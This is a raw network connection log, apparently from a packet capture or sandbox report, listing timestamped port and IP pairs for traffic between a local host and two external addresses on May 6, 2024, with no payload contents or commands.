May 6, 2024 07:53:02.992942095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992952108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992958069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992964029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992978096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992980003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992993116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.993000984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.993004084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.993019104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.993057966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245189905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245203972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245215893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245228052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245249033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245254040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245266914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245276928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245284081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245305061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245305061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245316982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245322943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245328903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245342016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245361090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245373964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245414019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245425940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245435953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245457888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245469093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245527983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245539904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245548964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245560884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245572090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245575905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245585918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245598078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245598078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245609999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245620012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245634079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245640039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245645046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245661974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245662928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245675087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245687008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245688915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245699883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245722055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245740891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245753050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245764971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245775938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245786905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245798111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245804071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245810032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245820999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245821953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245831013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245834112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245846033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245857954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245862007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245888948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245898008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245918989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245922089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245938063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.245943069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245966911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.245984077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246035099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246047974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246058941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246069908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246079922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246088028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246093035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246104956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246113062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246119976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246130943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246134043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246141911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246145964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246172905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246196032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246213913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246227026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246237040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246248960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246254921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246262074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246274948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246274948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246287107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246301889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246301889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246313095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246315956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246325016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246337891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246340990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246350050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.246364117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246382952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.246402025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.308409929 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:03.498452902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498471022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498482943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498493910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498505116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498522997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498527050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498534918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498547077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498558998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498564959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498572111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498583078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498583078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498594046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498600960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498605967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498616934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498625994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498629093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498635054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498641014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498651981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498652935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498663902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498675108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498676062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498688936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498698950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498701096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498713017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498723030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498723984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498737097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498747110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498749971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498759031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498763084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498775005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498789072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498790979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498800039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498811960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498817921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498823881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498836040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498836994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498848915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498853922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498861074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498872995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498883009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498884916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498897076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498907089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498917103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498924017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498924017 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498935938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498950005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498955011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498960972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498972893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498981953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.498985052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.498996019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499000072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499008894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499017954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499021053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499032974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499042034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499046087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499058962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499069929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499073029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499080896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499084949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499094009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499106884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499116898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499118090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499130964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499140978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499147892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499156952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499170065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499170065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499177933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499182940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499193907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499206066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499213934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499248028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499250889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499263048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499274015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499285936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499298096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499300957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499311924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499321938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499321938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499334097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499341965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499347925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499357939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499366045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499370098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499382019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499392986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499398947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499407053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499416113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499420881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499433041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499434948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499444962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499456882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499464035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499469995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499484062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499495029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499495983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499516964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499528885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499535084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499541998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499568939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499586105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499598980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499612093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499623060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499634027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499646902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499648094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499659061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499670029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499677896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499681950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499690056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499696016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499706984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499718904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499727964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499758959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499766111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499773026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499783993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499795914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499809027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499809980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499819994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499824047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499841928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499854088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499854088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499866009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499876976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499881983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499888897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499901056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499917030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499942064 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.499965906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499978065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.499989033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500000954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500011921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500011921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.500024080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500036001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500044107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.500046968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500060081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500066042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.500072956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500085115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500087976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.500121117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.500133991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500133991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.500147104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500158072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500169992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500173092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.500181913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.500202894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.500231028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.571624041 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:03.574182987 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:03.574233055 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:03.752069950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752237082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752252102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752264023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752278090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752290010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752301931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752310038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752315044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752330065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752343893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752360106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752372980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752379894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752393007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752394915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752404928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752405882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752420902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752439976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752443075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752454042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752465963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752466917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752480984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752484083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752494097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752506971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752516031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752521992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752537012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752542019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752552986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752563000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752568007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752579927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752583027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752609015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752624989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752635956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752639055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752654076 CEST	80	49741	5.42.66.10	192.168.2.4
